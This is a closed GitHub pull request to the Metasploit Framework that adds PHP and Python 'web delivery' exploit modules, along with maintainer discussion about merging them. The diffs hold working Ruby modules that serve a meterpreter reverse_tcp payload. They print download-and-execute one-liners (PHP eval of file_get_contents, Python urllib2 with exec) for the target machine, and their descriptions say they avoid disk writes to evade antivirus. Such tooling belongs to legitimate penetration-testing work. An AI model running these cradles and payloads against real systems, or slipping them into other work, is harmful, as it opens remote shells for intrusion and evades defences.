Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Addition of php web delivery and python web delivery #3018

Closed
wants to merge 11 commits into from

6 participants

@jakxx

Modules stands up web server and serves payload much like psh_web_delivery. This PR adds support for both PHP and python.

@jakxx

Not sure what to do about disclosure date in this case. First PR to msf so go easy on me :)

@zeroSteiner
Collaborator

@Meatballs1 Do you think it would be beneficial to combine these with your psh_web_delivery module into one like multi/misc/script_web_delivery? It looks like it could be accomplished by adding additional targets.

@jakxx

Yea I thought about that as well. Didnt know if it would be better to keep them separate or try combining them.

@Meatballs1
Collaborator

@nullbind has done something similar. But i was thinking that maybe payloads should contain the logic for downoad+eval similar to your arch_cmd changes @zerosteiner. Potentially they could do some kind of arch_cmd_web?? Or maybe this should be implemented as a stager for each respective arch?

Powershell is currently a special case as it is more like an encoder than a payload (we choose a native payload). But it hasnt been formalised as either of these yet.

Its definitely useful to have a handy delivery mechanism like this just need some thought about how best we can implement it to make it flexible. I was suprised how much and how differently the psh_web_delivery could be used but also want to be able to slot that style into psh cmd exploits where space is limited or badchars mean ithas to be b64 enc etc.

@jakxx

@Meatballs1 I like the idea of integrating it into payloads. At the same time, the current architecture just makes it so flexible. Excellent for scenarios where MSF was not used to gain initial command exec.

@wchen-r7
Collaborator

IMO they look like payloads+handlers. I'm not sure if they should be considered as exploits.

@jakxx

I am good with however you guys want to implement them. Just let me know what I need to do.

@jakxx

@wchen-r7 @Meatballs1 Any more thoughts on this?? I am kinda leaning towards @zeroSteiner 's idea of a mult/misc/script_web_delivery

@Meatballs1
Collaborator

Here is @nullbind's example: https://github.com/pwnwiki/q/blob/master/modules/exploits/netspi/ps_webshells.rb
Which is along the lines of a script_web_delivery.

I think people would find it useful, I'm surprised at the number of ways people have used psh_web_delivery

@jakxx

@Meatballs1 Awesome. I am close to having a new PR ready. Should I incorporate the powershell option or leave that as a stand alone module?

@Meatballs1
Collaborator

I don't see a reason to keep it standalone if it reduces the amount of duplicate code

@todb-r7 todb-r7 added the module label
@jakxx jakxx referenced this pull request
Merged

Script web delivery #3419

@jakxx

Closing for updated PR #3419

@jakxx jakxx closed this
@mwulftange mwulftange commented on the diff
modules/exploits/multi/php/php_web_delivery.rb
((44 lines not shown))
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} ?>|
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+ print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")

Generally, you don’t need .exe when calling a proper executable in Windows shell. So the first would suffice for both systems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
@mwulftange mwulftange commented on the diff
modules/exploits/multi/python/py_web_delivery.rb
((44 lines not shown))
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} |
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")

Same as above.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Jul 19, 2013
  1. @jakxx

    Added powershell psexec module

    jakxx authored
  2. @jakxx

    Removed Revision

    jakxx authored
Commits on Jul 22, 2013
  1. @jakxx
Commits on Jul 25, 2013
  1. @jakxx

    Updated Description

    jakxx authored
Commits on Feb 20, 2014
  1. @jakxx
  2. @jakxx

    Delete powershell_psexec.rb

    jakxx authored
  3. @jakxx

    Added php_web_delivery

    jakxx authored
Commits on Feb 21, 2014
  1. @jakxx

    Added py_web_delivery

    jakxx authored
  2. @jakxx

    Updating References

    jakxx authored
  3. @jakxx

    Updating References

    jakxx authored
Commits on Jun 2, 2014
  1. @jakxx
This page is out of date. Refresh to see the latest.
View
62 modules/exploits/multi/php/php_web_delivery.rb
@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PHP Payload Web Delivery',
+ 'Description' => %q{
+ This module quickly fires up a web server that serves a PHP payload.
+ The provided command will start PHP and then download and execute the
+ payload. The main purpose of this module is to quickly establish a session on a target
+ machine when the attacker has to manually type in the command himself, e.g. Command Injection,
+ RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
+ write to disk so is less likely to trigger AV solutions.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>',
+ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'php/meterpreter/reverse_tcp'
+ },
+ 'References' =>
+ [
+ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html']
+ [ 'URL', 'http://us1.php.net/eval']
+ [ 'URL', 'http://us1.php.net/file_get_contents']
+ ],
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} ?>|
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+ print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")

Generally, you don’t need .exe when calling a proper executable in Windows shell. So the first would suffice for both systems.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
+ end
+end
+
View
61 modules/exploits/multi/python/py_web_delivery.rb
@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Python Payload Web Delivery',
+ 'Description' => %q{
+ This module quickly fires up a web server that serves a Python payload.
+ The provided command will start Python and then download and execute the
+ payload. The main purpose of this module is to quickly establish a session on a target
+ machine when the attacker has to manually type in the command himself, e.g. Command Injection,
+ RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
+ write to disk so is less likely to trigger AV solutions and will allow privilege
+ escalations supplied by Meterpreter.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>',
+ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'python/meterpreter/reverse_tcp'
+ },
+ 'References' =>
+ [
+ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html']
+ [ 'URL', 'http://docs.python.org/2/library/urllib2.html']
+ ],
+ 'Platform' => 'py',
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} |
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")

Same as above.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
+ end
+end
Something went wrong with that request. Please try again.